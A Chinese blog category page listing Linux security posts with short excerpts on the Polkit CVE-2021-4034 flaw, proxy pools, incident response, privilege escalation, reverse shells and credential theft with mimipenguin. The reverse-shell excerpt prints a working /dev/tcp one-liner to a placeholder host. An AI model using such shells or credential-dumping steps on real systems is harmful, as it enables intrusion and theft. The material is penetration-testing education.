Linux
文章平均质量分 80
sash1mi
这个作者很懒,什么都没留下…
展开
-
CVE-2021-4034 Polkit
CVE-2021-4034 Polkit0x01 漏洞介绍Polkit是一个应用程序级别的工具集,通过定义和审核权限规则,实现不同优先级进程间的通讯:控制决策集中在统一的框架之中,决定低优先级进程是否有权访问高优先级进程。另外Polkit在系统层级进行权限控制,提供了一个低优先级进程和高优先级进程进行通讯的系统。和sudo等程序不同,Polkit并没有赋予进程完全的root权限,而是通过一个集中的策略系统进行更精细的授权。0x02 漏洞影响版本目前主流Linux版本可能均受影响0x03 漏洞分析原创 2022-01-26 18:55:26 · 3362 阅读 · 0 评论 -
闲来无事搭个代理池子
基于ProxyPool创建Proxifier代理如题目所见,闲来无事在做测试时发现被某网站封了IP,为防止再被封掉,因此有了这篇文章和搭建过程0x01 安装redis服务ubuntu16.04apt-get install redis-server检查是否服务是否启动ps aux |grep redisnetstat -lanp | grep 6379配置redis.conf文件配置密码及使用远程登参考:https://www.cnblogs.com/wxjnew/p/9189191.原创 2022-01-12 20:37:58 · 19449 阅读 · 3 评论 -
Linux入侵应急响应思路
Linux入侵应急响应思路0x01 登录情况排查w:用于显示目前登入系统的用户信息,以及正在执行的程序,便于查看当前系统的使用情况last:用于显示用户最近登录信息,可能会留下入侵者的痕迹uptime:查看当前时间、系统运行了多久时间、当前登录的用户有多少,以及前 1、5 和 15 分钟系统的平均负载,便于查看系统的运行状况和负载情况(判断是否挖矿等提供一定凭据)0x02 查询进程情况top:查看资源消耗情况,id表示系统cpu剩余,若该值很小,说明系统可能被用于挖矿等严重占用资源,此原创 2021-10-25 12:45:38 · 390 阅读 · 1 评论 -
一文吃透Linux提权
一文吃透Linux提权转载:https://mp.weixin.qq.com/s?__biz=MzIxMTEyOTM2Ng==&mid=2247491654&idx=1&sn=d9d9b5ffa5cec1ec366620da1be2ffd9&chksm=9758a53fa02f2c299cec6f7f55156c25b641eb5fb528b2c819756baac4f56e442107699ccdb8&mpshare=1&scene=1&srcid原创 2020-12-03 14:55:50 · 126 阅读 · 0 评论 -
kali Debian x86_64搭建Go语言环境
kali Debian x86_64搭建Go语言环境1、Go 安装包下载地址:https://studygolang.com/dl这里选择Linux版本2、下载后拖入kali中root根目录下3、解压go环境压缩包tar zxvf go1.15.5.linux-amd64.tar.gz4、将go文件包移至该目录下mv go /usr/local/5、创建go语言工作空间mkdir -p $HOME/gomkdir -p go6、配置Go语言环境变量a.使用Vim打开.ba原创 2020-11-24 15:14:02 · 328 阅读 · 0 评论 -
弹shell的多种姿势小记
弹shell的多种姿势小记在渗透测试的过程中,当拿到webshell以后,如果目标主机是Windows主机,则是通过开3389端口在远程连接。如果目标主机是linux服务器,一般会选择反弹shell来进行操作,在这里简单总结下反弹shell常见的几种姿势。01、exec 0&0 2>&00<&196;exec 196<>/dev/tcp/your ip/port; sh <&196 >&196 2>&196原创 2020-11-13 14:20:24 · 373 阅读 · 0 评论 -
Linux登录凭证窃取二三
Linux登录凭证窃取二三1、history命令记录敏感操作Linux系统会自动把用户的操作命令记录到历史列表中,当用户在命令行中输入账号、密码进行登录时,将会导致历史敏感信息泄露。2、mimipenguin抓取密码github下载地址:https://github.com/huntergregal/mimipenguinLinux下的密码抓取神器,需要root权限运行,通过转储进程并提取很可能包含明文密码的行来利用内存中的明文凭证,目前支持Kali、Ubnutu等操作系统。(没有显示密码原创 2020-10-21 11:43:18 · 337 阅读 · 2 评论